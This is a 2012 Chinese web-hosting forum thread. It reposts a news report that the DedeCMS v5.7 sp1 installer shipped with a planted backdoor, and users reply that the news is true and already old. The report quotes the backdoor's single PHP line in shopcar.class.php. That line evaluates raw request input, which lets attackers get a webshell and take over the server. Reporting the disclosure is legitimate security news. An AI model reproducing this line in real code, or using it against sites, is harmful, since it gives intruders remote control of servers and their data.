全球主机交流论坛

标题: 织梦CMS系统被指植入后门 [打印本页]

作者: tibbs 时间: 2012-3-22 19:58
标题: 织梦CMS系统被指植入后门
　　瑞星与360今日对外发布警示，称国内知名的PHP开源网站管理系统织梦CMS（DedeCms）v5.7 sp1版本安装包被发现植入后门，黑客可通过此后门直接获得网站的控制权限，获取存储在服务器上的文件和数据库。
　　据织梦CMS官方数据显示，目前约有70万网站使用该系统搭建，涉及企业、政府机关、媒体机构、行业及个人网站等。
　　安全界人士分析发现，此次织梦CMS曝出的后门恶意代码存在于购物车类文件（shopcar.class.php）中，此类文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。凡是调用该购物车类的文件均会触发后门，黑客只需要构造简单的数据包提交到服务器，就能够获取到该网站的WebShell，通过对服务器进一步渗透攻击，进而获取服务器的最高权限，直接访问服务器上的文件、数据库等信息。

  -----------来源网易
         ******************************************************************
            真  滴假滴？？
         ******************************************************************

作者: 西崽猪猪 时间: 2012-3-22 19:59
真的

作者: vagaa 时间: 2012-3-22 19:59
论坛前几天就有人发了啊

作者: light 时间: 2012-3-22 20:00
真的

作者: 弓虽女干 时间: 2012-3-22 20:01
wooyun上看到过

作者: tibbs 时间: 2012-3-22 20:01
我去，几天没上网居然 OUT成这样了

作者: 小和尚 时间: 2012-3-22 20:02
此事已经不是新闻了

作者: ellrywych 时间: 2012-3-22 20:08
必须的，

作者: 一不小心 时间: 2012-3-22 20:14
日，织梦这回估计萎了。

欢迎光临全球主机交流论坛 (https://fd.vvwvv.eu.org/)